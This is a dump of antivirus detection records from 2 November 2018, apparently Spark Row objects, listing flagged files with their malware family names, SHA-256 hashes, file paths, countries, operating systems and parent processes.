  Row(detection=Row(filename='010_4b29ace8_5d35dba5.exe', filepath='C:\\Users\\X\\Videos\\010_4b29ace8_5d35dba5.exe', filesize=223744000, name='HEUR/AGEN.1020711.#M1.#R1'), hash='5a92ab2abd0ad8991de3624ce1d7fefc6b1b7782fd9b9bc1aa837506b65e067e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe416_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe416 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:48:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T12:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054217-073f5982', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054217-073F5982', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050241-7f7e9f56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050241-7F7E9F56', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='batchb.exe', filepath='G:\\New folder (2)\\SAS\\sas\\20080620_2104\\Software Disk1\\sas\\reporter\\cmponent\\batch\\batchb.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='560f03e781ba65d04a128daf5c03af3c4e3d8368b658ed52cd34e592c69f02a7', metadata=Row(cmdline='\\\\\\/service', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Common Files\\Softwin\\BitDefender Scan Server\\bdss.exe', parentsize=81920, timestamp='2018-11-02T12:31:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101803-2635a67e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e2ddb0b\\AVSCAN-20181102-101559-16AC841C\\AVSCAN-20181102-101803-2635A67E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054258-1fa8a15a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054258-1FA8A15A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051505-3a972afe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051505-3A972AFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150709-9f1444d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-150709-9F1444D1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:10:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T111829-14059/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061250-4bf38475', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061250-4BF38475', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133313-87ce6943', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133313-87CE6943', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:36:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054550-867faeeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054550-867FAEEB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061705-e40e92d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061705-E40E92D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061738-f7d9eb09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061738-F7D9EB09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061851-23169d4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061851-23169D4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052114-16bfbdf4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052114-16BFBDF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062555-1fd4fb63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062555-1FD4FB63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053950-af9b13cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053950-AF9B13CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061936-3e00a376', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061936-3E00A376', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052726-f46f1925', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052726-F46F1925', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062658-452645ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062658-452645FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062010-5204a182', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062010-5204A182', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061011-ed024208', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061011-ED024208', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052731-f78da012', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052731-F78DA012', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052159-318046fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052159-318046FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052720-f0ee28d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052720-F0EE28D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060412-172601c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060412-172601C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052151-2ccc2c82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052151-2CCC2C82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052623-cf087cd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052623-CF087CD1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052920-380504c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052920-380504C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061816-0e8c816e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061816-0E8C816E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053620-32e78a3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053620-32E78A3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061127-1a97c693', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061127-1A97C693', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055140-56f29e65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055140-56F29E65', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053442-f8019769', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053442-F8019769', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054649-a98d305e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054649-A98D305E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050601-f62353fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050601-F62353FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1606d90b.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1606d90b.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:09:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052530-af2233d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052530-AF2233D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053443-f90e3fbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053443-F90E3FBB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051312-f78e8fb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051312-F78E8FB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7a00b10c55f7d7fdbad4e1bb9da67b5719bde6fa5881d99edce14cde01410757', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7A00B10C55F7D7FDBAD4E1BB9DA67B5719BDE6FA5881D99EDCE14CDE01410757', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a00b10c55f7d7fdbad4e1bb9da67b5719bde6fa5881d99edce14cde01410757', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:58:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:54:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:48:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060918-cd57dfb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060918-CD57DFB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00005905', filepath='C:\\Windows\\Temp\\d6557b5b-0eb0-471c-98b6-e02fe2b8a757\\tmp00000340\\tmp00005905', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='83e8223c2252612c9fd32083ff20098b1fc19d3f46c044536081a4e6d408014f', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Cino\\Programy\\Ad-Aware Antivirus\\11.11.898.9090\\AdAwareService.exe', parentsize=730496, timestamp='2018-11-02T12:07:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052621-cdc95947', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052621-CDC95947', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060727-8bb50e2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060727-8BB50E2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054307-25306f09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054307-25306F09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055456-cbe791cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055456-CBE791CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:43:58Z'), dt=datetime.date(2018, 11, 2)),
